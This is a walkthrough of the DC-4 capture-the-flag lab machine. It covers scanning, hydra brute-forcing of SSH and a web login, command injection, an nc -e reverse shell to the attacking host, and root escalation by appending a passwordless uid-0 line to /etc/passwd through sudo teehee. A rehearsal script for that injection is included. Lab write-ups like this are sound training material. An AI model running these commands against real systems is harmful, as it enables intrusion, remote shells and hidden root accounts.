For personal entertainment only.
Target machine information
Download: http://www.five86.com/downloads/DC-4.zip
1. Host scanning
arp-scan -l
nmap -p 1-65535 -A -sV 192.168.17.130
![](https://upload-images.jianshu.io/upload_images/4664072-a30ebe91780badaa.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
2. Information gathering
dirb http://192.168.17.130
![](https://upload-images.jianshu.io/upload_images/4664072-b7db9507bdb561df.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-d996a916d57f98f4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-7398a857e1f85232.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-3ff0048eb36ede77.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-c5e43f2d896adb47.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
3. Finding and exploiting vulnerabilities
Brute-forcing SSH
hydra -L /root/user.txt -P /root/rockyou.txt -t 5 ssh://192.168.17.130
![](https://upload-images.jianshu.io/upload_images/4664072-0e238c4d8bad854c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
The wordlist is far too large for this to finish in a reasonable time.
Web page
![](https://upload-images.jianshu.io/upload_images/4664072-54f01da78387bff8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Brute force
![](https://upload-images.jianshu.io/upload_images/4664072-9e67f793b541a9c6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-e46cf9e6f97ef81e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Or brute-force the password with hydra (the form fields must be joined with `&`, and `S=logout` marks a response containing "logout" as a successful login; `-F` stops at the first hit):
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.17.130 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F
Login successful
![](https://upload-images.jianshu.io/upload_images/4664072-0f5d6bddac9ed429.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Information gathering
![](https://upload-images.jianshu.io/upload_images/4664072-7c7f98dbd128bdb9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Intercept the request and replace the submitted command with one of your own
![](https://upload-images.jianshu.io/upload_images/4664072-96ecf85a1aef7eb8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-70db14520e78c614.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-5f59bcec89580e00.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-49a229556bfc9ebf.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Reverse shell command (start a listener on port 4444 on the attacking host first):
nc -e /bin/bash 192.168.17.129 4444
![](https://upload-images.jianshu.io/upload_images/4664072-58f1cf9d9911aece.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-55269b128570b38f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
python -c 'import pty;pty.spawn("/bin/bash")'
![](https://upload-images.jianshu.io/upload_images/4664072-ef52525998dfb0a8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Information gathering
![](https://upload-images.jianshu.io/upload_images/4664072-c28706cbe2f4f184.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-cf9141ec1b85a142.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Copy it and use it as a wordlist
![](https://upload-images.jianshu.io/upload_images/4664072-85d676b017808561.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
SSH login
![](https://upload-images.jianshu.io/upload_images/4664072-267b89fccf79c396.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Check information
![](https://upload-images.jianshu.io/upload_images/4664072-b4f90dcba9095111.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-fbdcdc5d0c4adbec.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Switch to the account [charles:^xHhA&hvim0y]
![](https://upload-images.jianshu.io/upload_images/4664072-2d0e4c60ebdb6826.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Checking sudo privileges shows that this user can run /usr/bin/teehee as root without a password
![](https://upload-images.jianshu.io/upload_images/4664072-f3e8c414e6f5fef3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Information gathering
![](https://upload-images.jianshu.io/upload_images/4664072-bd1b38444326d753.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Privilege escalation method 1
Add an account: teehee behaves like tee, so `-a` appends stdin to a root-owned file. The line below appends a uid 0 account with an empty password field, so `su test` needs no password:
echo test::0:0:::/bin/bash | sudo teehee -a /etc/passwd
tail -n 5 /etc/passwd
su test
![](https://upload-images.jianshu.io/upload_images/4664072-a90ad5abacdedb96.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-b9197438407fceb4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
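The /etc/passwd injection above, rehearsed on a scratch copy before touching the real file. This is an added example, not code from the original write-up: on the target, teehee is a renamed tee, so `tee -a` here stands in for `sudo teehee -a`, and the scratch passwd contents are constructed for the demo.

```shell
#!/bin/sh
# Added example (not from the original write-up): rehearse the passwd line
# on a scratch file so the 7-field layout is right before appending it as root.
# passwd fields: name:password:uid:gid:gecos:home:shell
# An empty password field means su/login asks for no password at all.

# Create a constructed scratch passwd file (demo content, not the target's).
make_scratch_passwd() {
  f=$(mktemp)
  printf 'root:x:0:0:root:/root:/bin/bash\n' > "$f"
  printf 'charles:x:1001:1001::/home/charles:/bin/bash\n' >> "$f"
  echo "$f"
}

# Append a passwordless uid 0 entry for $2 to $1.
# On the target the pipe goes to `sudo teehee -a /etc/passwd` instead.
add_root_user() {
  echo "$2::0:0:::/bin/bash" | tee -a "$1" >/dev/null
}

# uid of user $2 in file $1 (empty if absent)
uid_of() {
  awk -F: -v u="$2" '$1 == u { print $3 }' "$1"
}

# number of colon-separated fields on the line of user $2; must be 7
field_count() {
  awk -F: -v u="$2" '$1 == u { print NF }' "$1"
}

# "yes" if the password field of user $2 is empty (no password needed)
has_empty_password() {
  awk -F: -v u="$2" '$1 == u { print ($2 == "") ? "yes" : "no" }' "$1"
}

# Run with `sh thisfile.sh demo` to see the rehearsal on a scratch file.
if [ "${1:-}" = "demo" ]; then
  f=$(make_scratch_passwd)
  add_root_user "$f" test
  tail -n 3 "$f"
  echo "uid=$(uid_of "$f" test) fields=$(field_count "$f" test) nopass=$(has_empty_password "$f" test)"
  rm -f "$f"
fi
```

If `field_count` is anything other than 7, the appended line is malformed and the new account will simply not work, so check this on the scratch copy first; a broken line appended to the real /etc/passwd cannot be removed again with an append-only primitive like teehee.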